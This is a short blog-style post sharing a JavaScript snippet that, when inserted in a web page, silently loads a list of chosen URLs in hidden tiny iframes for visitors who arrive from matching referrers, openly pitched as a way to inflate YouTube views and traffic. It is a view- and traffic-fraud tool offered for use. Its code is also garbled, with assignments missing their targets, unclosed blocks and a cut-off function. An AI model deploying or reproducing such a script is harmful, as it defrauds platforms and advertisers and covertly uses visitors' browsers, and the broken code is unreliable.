Script to Get Unlimited Traffic for FREE

Ok here goes….
What if you could load as many urls you wanted based on a single request. That would be awesome right – you could boost youtube views, lower your conversion or the like.
Well I wrote such a script for you guys.
Only two things you should know is this:

var rDomains = ["",""];
This is the collection of urls you want to load silently. Add as many as you want.
var aDomains = [".com"];
This is the referrer check. IF you only want the script to work when people are comming from google. Write
“” in there. You can comma delimit the list if you want.
var aDomains = ["",""];
So here is the main script you simple insert on your HTML-page and the magic happens.
It’s still a good idea to take care of the referrer on your pages. I will show you a little trick I use next time around.
Hope you like this.
<script type="text/javascript">
    var sLocation = document.referrer.toLocaleLowerCase();
    //Links to boost
    var rDomains = ["",""];
    //Allowed domain referrer
    var aDomains = [".com"];
    var valid = 0;

    //Valid referrer
    for (i=0;i<aDomains.length;i++) {
        //Check referrer
        if (sLocation.indexOf(aDomains[i], 0) > -1)
            valid = 1;

    //Valid referrer
    if (valid == 1)
        for (i=0;i<rDomains.length;i++) {
            invisibleWindow("mydiv" + i,rDomains[i]);

    function invisibleWindow(iframeID, url) {
        divel = document.createElement("div"); = "div" + iframeID; = "5px"; = "5px"; = "hidden";

        //Add div